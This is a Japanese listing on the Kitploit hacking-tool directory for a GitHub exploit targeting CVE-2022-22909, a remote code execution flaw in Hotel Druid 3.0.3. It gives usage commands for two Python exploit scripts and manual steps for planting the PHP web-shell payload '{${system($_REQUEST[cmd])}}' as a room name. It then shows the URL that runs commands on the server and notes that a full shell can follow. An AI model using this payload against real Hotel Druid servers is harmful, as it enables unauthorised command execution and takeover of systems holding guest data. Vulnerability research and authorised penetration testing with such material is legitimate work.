Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3のリモートコード実行(CVE-2022-22909)用のPythonベースのエクスプロイト。部屋名を介してPHPペイロードを注入し、脆弱なターゲット上でコマンド実行とシェルアクセスを実現します。 | Kitploit
ツール/GitHubGitHub/kaal18/cve-2022-22909
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubkaal18/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3のリモートコード実行(CVE-2022-22909)用のPythonベースのエクスプロイト。部屋名を介してPHPペイロードを注入し、脆弱なターゲット上でコマンド実行とシェルアクセスを実現します。

リポジトリを見る
2424年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-22909 Hotel Druid 3.0.3 - リモートコード実行 (RCE)

kaal によるエクスプロイト

エクスプロイト

  1. HotelDruidExploit.py

このエクスプロイトは、PHP ペイロードをルーム名として新しいルームを作成します。

使用方法 : $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image


  1. HotelDruidExploitRoom.py

このエクスプロイトは、ルーム名を既に知っている場合に動作します。

使用方法 : $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image


エクスプロイトの手順 :

1). Hotel Druid ページに移動します。

2). Tables -> Rooms をクリックします。

image

3). Create New Room フィールドに以下の PHP コードを追加し、Add をクリックします。

{${system($_REQUEST[cmd])}}

image

4). 「Room」名フィールドにペイロードを含む新しいルームが表示されます。

image

5). 以下のリンクにアクセスするとコマンド実行ができ、後でフルシェルを取得できます。

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

注 : IP を hoteldruid ターゲットの IP に変更してください。

脆弱性の説明 :

この脆弱性は、ルーム名が /var/www/html/hoteldruid/dati/selectappartamenti.php 内に保存されるために発生します。

image

そして selectappartamenti.php は PHP ファイルであるため、そのファイル内の PHP コードはサーバーによって実行されます。

ツールをダウンロード